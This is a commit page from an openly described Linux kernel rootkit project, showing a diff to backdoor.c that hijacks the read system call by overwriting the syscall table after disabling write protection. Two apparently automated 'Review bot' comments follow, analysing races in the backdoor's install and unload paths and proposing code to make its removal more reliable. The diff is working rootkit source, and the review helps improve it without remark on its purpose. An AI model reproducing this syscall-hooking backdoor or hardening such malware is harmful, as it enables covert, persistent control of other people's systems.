linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit ab51a89125ebad2454b244bbabda8cc5f6ccc264
parent 1566bd56d0414a98e647b6bd8ebf43d7c2c9ee7d
Author: deurzen <m.deurzen@tum.de>
Date:   Sun,  6 Dec 2020 15:31:51 +0100

fixes read-backdoor unloading issue

Diffstat:
Msrc/backdoor.c | 24++++++++++--------------
1 file changed, 10 insertions(+), 14 deletions(-)

diff --git a/src/backdoor.c b/src/backdoor.c
@@ -14,11 +14,9 @@ ssize_t (*current_tty_read)(struct file *, char *, size_t, loff_t *);
 void
 backdoor_read(void)
 {
- if (atomic_inc_return(&read_install_count) == 1) {
- disable_protection();
- sys_calls[__NR_read] = (void *)g7_read;
- enable_protection();
- }
+ disable_protection();
+ sys_calls[__NR_read] = (void *)g7_read;
+ enable_protection();
 }
 void
@@ -61,15 +59,13 @@ unbackdoor(void)
 current_tty_read = NULL;
 } else if (sys_read) {
- if (atomic_dec_return(&read_install_count) < 1) {
- disable_protection();
- sys_calls[__NR_read] = (void *)sys_read;
- enable_protection();
+ disable_protection();
+ sys_calls[__NR_read] = (void *)sys_read;
+ enable_protection();
- // Sleeping here is very important, as without it
- // we would stall the CPU...
- while ((cur = atomic_read(&read_count)) > 0)
- msleep(250);
- }
+ // Sleeping here is very important, as without it
+ // we would stall the CPU...
+ while ((cur = atomic_read(&read_count)) > 0)
+ msleep(250);
 }
 }
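Review bot: With `read_install_count` gone, `backdoor_read()` rewrites `sys_calls[__NR_read]` on every call and nothing any longer sequences an install against an in-progress `unbackdoor()`; a caller entering this function while the second hunk's drain loop is still waiting on `read_count` would silently re-install `g7_read` into the slot that was just restored, and the drain loop would then never be reached for that re-install. The write itself is idempotent (same pointer each time), so the only lost property is that install/uninstall calls no longer have to pair up, which is worth stating since callers outside this file may have relied on it. Whether `disable_protection()`/`enable_protection()` tolerate preemption or concurrent callers between them cannot be judged from this hunk. I would document the new contract above `void`: `/* Point the read syscall slot at g7_read. Idempotent; repeated calls rewrite the same pointer. Must not be called concurrently with unbackdoor(), which restores the slot and then waits for in-flight reads. */`.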
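Review bot: The drain loop at the end of the `else if (sys_read)` branch is unbounded: a task parked in a blocking read (a pipe, socket or tty with no data) keeps `read_count` above zero indefinitely, so `unbackdoor()`, and presumably the module exit path that calls it, never returns and the unload hangs. The loop also only proves that `read_count` was zero at one instant; if `g7_read` increments the counter only after it has been entered (its body is not visible here), a CPU that already loaded the old table entry but has not yet incremented is missed, and freeing the module right after the loop can still run unmapped code, so a grace period after the loop (e.g. `synchronize_rcu()`) narrows that window. I would bound the wait and log when reads remain rather than spin forever, as below; `unbackdoor()` starts before this hunk, and `cur` is declared there, so `waited_ms` and `READ_DRAIN_TIMEOUT_MS` would need to be declared alongside it.
```c
		enable_protection();

		/* … unchanged: comment on why we must sleep rather than spin … */
		waited_ms = 0;
		while ((cur = atomic_read(&read_count)) > 0 && waited_ms < READ_DRAIN_TIMEOUT_MS) {
			msleep(250);
			waited_ms += 250;
		}
		if (cur > 0)
			pr_warn("backdoor: %d read(s) still in flight after %u ms; unload is unsafe\n", cur, waited_ms);
		/* let CPUs that fetched the old slot but have not yet bumped read_count get out */
		synchronize_rcu();
```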